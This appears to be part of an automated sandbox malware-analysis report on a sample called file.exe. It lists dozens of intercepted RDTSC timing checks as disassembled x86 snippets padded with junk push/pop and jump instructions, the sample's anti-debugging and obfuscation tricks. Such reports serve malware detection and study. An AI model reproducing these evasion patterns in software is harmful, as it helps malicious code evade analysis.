Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E73A4A second address: E73A51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E75AF8 second address: E75AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E75AFD second address: E75B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB26h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E851C6 second address: E851D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F450CC4A606h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8C7D5 second address: E8C7DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8C7DF second address: E8C7E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8B500 second address: E8B516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F450CC4AB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jc 00007F450CC4AB16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8BD7E second address: E8BD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8BD84 second address: E8BD8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8BD8A second address: E8BD8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8BD8F second address: E8BD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8BD9A second address: E8BD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8BF3F second address: E8BF5A instructions: 0x00000000 rdtsc 0x00000002 je 00007F450CC4AB22h 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8C0C0 second address: E8C0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F450CC4A606h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8C0CD second address: E8C0DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8C0DE second address: E8C0F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A611h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8C0F5 second address: E8C0F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E92C0A second address: E92C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jno 00007F450CC4A606h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E919D4 second address: E919FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Fh 0x00000007 jmp 00007F450CC4AB20h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E91B7C second address: E91B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E91B81 second address: E91B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E91B86 second address: E91B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E92496 second address: E9249A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9249A second address: E9249E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9249E second address: E924C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F450CC4AB1Ch 0x0000000e je 00007F450CC4AB16h 0x00000014 js 00007F450CC4AB22h 0x0000001a jl 00007F450CC4AB16h 0x00000020 jng 00007F450CC4AB16h 0x00000026 push eax 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E924C8 second address: E924CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E95832 second address: E95836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E95836 second address: E95842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F450CC4A606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E95842 second address: E95847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E95847 second address: E9585B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jbe 00007F450CC4A60Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1FC14 second address: E1FC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F450CC4AB2Bh 0x0000000b jmp 00007F450CC4AB25h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1FC38 second address: E1FC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F450CC4A606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1FC42 second address: E1FC46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1FC46 second address: E1FC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F450CC4A614h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F450CC4A612h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FAAA second address: E9FAC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F450CC4AB1Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FAC0 second address: E9FAC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FAC5 second address: E9FAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB29h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FC1D second address: E9FC2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F450CC4A60Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FD80 second address: E9FD9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F450CC4AB24h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FD9C second address: E9FDA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9FDA0 second address: E9FDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA00A3 second address: EA00A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA00A7 second address: EA00D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F450CC4AB1Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F450CC4AB1Eh 0x00000011 jg 00007F450CC4AB16h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a jc 00007F450CC4AB59h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jns 00007F450CC4AB16h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4605A second address: E4606B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A60Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4606B second address: E4606F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4606F second address: E46079 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E46079 second address: E4608F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB22h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4608F second address: E46093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E46093 second address: E460A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jl 00007F450CC4AB16h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E460A7 second address: E460AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E460AD second address: E460B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E460B3 second address: E460B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E460B7 second address: E460BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA09A0 second address: EA09C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F450CC4A617h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA09C6 second address: EA09CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA09CE second address: EA09D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA09D5 second address: EA09DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9F1F3 second address: E9F1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA4391 second address: EA43BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F450CC4AB1Fh 0x0000000e jmp 00007F450CC4AB22h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA43BB second address: EA43C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA43C3 second address: EA43D3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4AB22h 0x00000008 jnp 00007F450CC4AB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E643FA second address: E64400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E648C4 second address: E648D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4AB1Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E648D7 second address: E648FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b jmp 00007F450CC4A616h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E64A10 second address: E64A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E64A15 second address: E64A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E64B9B second address: E64BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F450CC4AB16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E64C7E second address: E64C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6517E second address: E6519E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4AB20h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E652AD second address: E652C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A617h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E652C8 second address: E652E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F450CC4AB1Eh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F450CC4AB16h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6559B second address: E6565D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F450CC4A619h 0x00000010 popad 0x00000011 pop edx 0x00000012 nop 0x00000013 or dx, C629h 0x00000018 lea eax, dword ptr [ebp+1248F021h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F450CC4A608h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 pushad 0x00000039 jmp 00007F450CC4A616h 0x0000003e popad 0x0000003f jns 00007F450CC4A620h 0x00000045 nop 0x00000046 je 00007F450CC4A60Eh 0x0000004c push edi 0x0000004d jbe 00007F450CC4A606h 0x00000053 pop edi 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jmp 00007F450CC4A619h 0x0000005d jns 00007F450CC4A606h 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6565D second address: E4605A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F450CC4AB18h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dx, bx 0x00000027 call dword ptr [ebp+122D1A5Bh] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F450CC4AB1Eh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA76EC second address: EA76F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA76F2 second address: EA7712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F450CC4AB16h 0x0000000a popad 0x0000000b jmp 00007F450CC4AB25h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA7297 second address: EA72CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F450CC4A612h 0x00000008 pop ecx 0x00000009 je 00007F450CC4A619h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F450CC4A611h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA72CE second address: EA72D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA72D2 second address: EA72E6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F450CC4A606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F450CC4A60Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA72E6 second address: EA72EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA741D second address: EA7421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9E29 second address: EA9E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB22h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9E3F second address: EA9E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9E43 second address: EA9E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9E4B second address: EA9E56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F450CC4A606h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9E56 second address: EA9E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9E67 second address: EA9E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4A60Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jne 00007F450CC4A606h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA9E8D second address: EA9E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAA132 second address: EAA178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F450CC4A60Bh 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F450CC4A619h 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F450CC4A60Ah 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EADAAA second address: EADAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EADAB1 second address: EADAD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A613h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F450CC4A60Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EADD73 second address: EADD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EAE02E second address: EAE048 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F450CC4A606h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F450CC4A60Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB15A9 second address: EB15AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB15AF second address: EB15D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 jmp 00007F450CC4A611h 0x0000000d jng 00007F450CC4A606h 0x00000013 pop eax 0x00000014 jp 00007F450CC4A60Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB1722 second address: EB1735 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB1AE3 second address: EB1B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F450CC4A618h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
